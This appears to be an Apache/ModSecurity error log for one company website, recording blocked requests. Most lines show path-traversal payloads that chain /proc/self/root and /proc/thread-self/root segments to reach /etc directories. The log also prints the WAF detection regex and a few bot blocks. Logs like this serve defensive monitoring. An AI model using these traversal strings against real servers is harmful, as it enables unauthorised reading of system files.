[Wed Mar 18 14:47:18.656703 2026] [:error] [pid 17653:tid 140411699963648] [client 74.7.243.128:43268] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrlJcdf6f5d65gmYZT_vAAAAsU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:47:20.163509 2026] [:error] [pid 15051:tid 140411658000128] [client 74.7.241.31:33182] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrlKCmAPhZkrhU8w4mXUQAAAIo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:47:26.885431 2026] [:error] [pid 30077:tid 140411683178240] [client 74.7.243.128:47190] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrlLvu8EFLIOrSqIpssKwAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:47:30.457174 2026] [:error] [pid 14269:tid 140411658000128] [client 74.7.243.128:47206] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrlMgbLMZ6AikZjR9XqmgAAAAo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:47:31.736622 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.241.31:37246] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrlMwkwaGbbGflqUZA9DwAAAM8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:47:37.288073 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.241.31:56730] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrlOeoXxyEfFpUF8f-diQAAAUk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:47:49.644582 2026] [:error] [pid 17887:tid 140411607643904] [client 74.7.241.31:55200] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrlRQkwaGbbGflqUZA9IAAAANA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:48:12.953024 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.243.128:36728] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrlXNa6ubjKNq_cu4bJJgAAA1M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 14:48:57.049192 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.243.128:51230] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrlieoXxyEfFpUF8f-eIAAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:49:22.383576 2026] [:error] [pid 31803:tid 140411691570944] [client 74.7.243.128:37938] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrlouyqAr6etmhZHNrzbQAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/run/initramfs/state/etc
[Wed Mar 18 14:49:26.199832 2026] [:error] [pid 29882:tid 140411649607424] [client 74.7.243.128:44276] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrlpkzinOy1jxa1j4dF1gAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:49:27.608635 2026] [:error] [pid 31803:tid 140411649607424] [client 74.7.244.43:45332] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrlp-yqAr6etmhZHNrzcwAAAEs"]
[Wed Mar 18 14:49:34.400625 2026] [:error] [pid 31803:tid 140411624429312] [client 74.7.228.61:57250] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abrlreyqAr6etmhZHNrzhgAAAE4"]
[Wed Mar 18 14:50:38.151386 2026] [:error] [pid 31803:tid 140411666392832] [client 74.7.243.128:44292] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrl7uyqAr6etmhZHNr0MgAAAEk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:50:39.500215 2026] [:error] [pid 30077:tid 140411691570944] [client 74.7.243.128:38308] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrl7_u8EFLIOrSqIpss9AAAAkY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:51:16.495161 2026] [:error] [pid 29882:tid 140411658000128] [client 74.7.243.128:38316] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrmFEzinOy1jxa1j4dGcQAAAQo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:51:53.989306 2026] [mime_magic:error] [pid 30077:tid 140411599251200] (70014)End of file found: [client 57.141.18.7:43838] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 14:52:21.506550 2026] [:error] [pid 17887:tid 140411607643904] [client 74.7.241.31:55550] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrmVQkwaGbbGflqUZA-lwAAANA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:53:20.044765 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.243.128:54898] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrmkOoXxyEfFpUF8f-fagAAAUU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:53:23.382727 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.241.31:37938] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrmk-yqAr6etmhZHNr0xwAAAEQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:53:24.911554 2026] [:error] [pid 30077:tid 140411674785536] [client 74.7.241.31:60772] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrmlPu8EFLIOrSqIpstTwAAAkg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:53:26.138521 2026] [:error] [pid 15051:tid 140411624429312] [client 74.7.241.31:60788] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrmlimAPhZkrhU8w4mYNwAAAI4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:53:27.511626 2026] [:error] [pid 11816:tid 140411540502272] [client 74.7.241.31:52844] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrml-w_le52K8_3pV0IkQAAAhg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:53:28.819535 2026] [:error] [pid 31803:tid 140411557287680] [client 74.7.241.31:52846] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrmmOyqAr6etmhZHNr0zQAAAFY"], referer: 